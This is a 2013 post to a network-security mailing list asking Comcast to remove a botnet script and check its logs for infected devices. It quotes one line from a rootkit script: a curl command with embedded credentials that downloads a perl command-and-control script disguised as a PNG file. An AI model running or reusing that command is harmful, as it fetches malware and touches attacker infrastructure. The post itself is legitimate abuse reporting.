[nsp-sec] Comcast - please remove botnet script

Andy Davidson andy at lonap.net
Mon Mar 18 08:22:11 EDT 2013


Hi,

Seen in a root kit script :

curl ftp://kuhnhunter:kuhndog@home.comcast.net/apache_32.png

It's a perl script for communicating with a C&C system.

If Comcast could nuke that (and maybe perform some analysis on the logs of
possibly owned devices talking to it ?), that would be great.

Love,
Andy





More information about the nsp-security mailing list